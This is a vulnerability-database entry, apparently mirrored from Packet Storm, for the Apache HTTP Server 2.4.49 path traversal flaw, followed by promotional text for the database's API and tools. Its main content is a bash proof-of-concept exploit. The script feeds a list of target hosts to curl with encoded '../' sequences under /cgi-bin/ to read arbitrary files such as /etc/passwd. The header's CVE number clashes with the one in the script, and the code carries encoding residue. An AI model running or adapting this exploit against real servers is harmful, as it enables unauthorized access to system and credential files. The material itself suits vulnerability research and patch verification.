Lucene search
K

Apache HTTP Server 2.4.49 Path Traversal

🗓️ 06 Oct 2021 00:00:00Reported by Lucas SouzaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 898 Views

Apache HTTP Server 2.4.49 Path Traversal CVE-2021-4177

Related
Code
`# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal  
# Date: 10/05/2021  
# Exploit Author: Lucas Souza https://lsass.io  
# Vendor Homepage: https://apache.org/  
# Version: 2.4.49  
# Tested on: 2.4.49  
# CVE : CVE-2021-41773  
# Credits: Ash Daulton and the cPanel Security Team  
  
#!/bin/bash  
  
if [[ $1 =3D=3D '' ]]; [[ $2 =3D=3D '' ]]; then  
echo Set [TAGET-LIST.TXT] [PATH]  
echo ./PoC.sh targets.txt /etc/passwd  
exit  
fi  
for host in $(cat $1); do  
curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation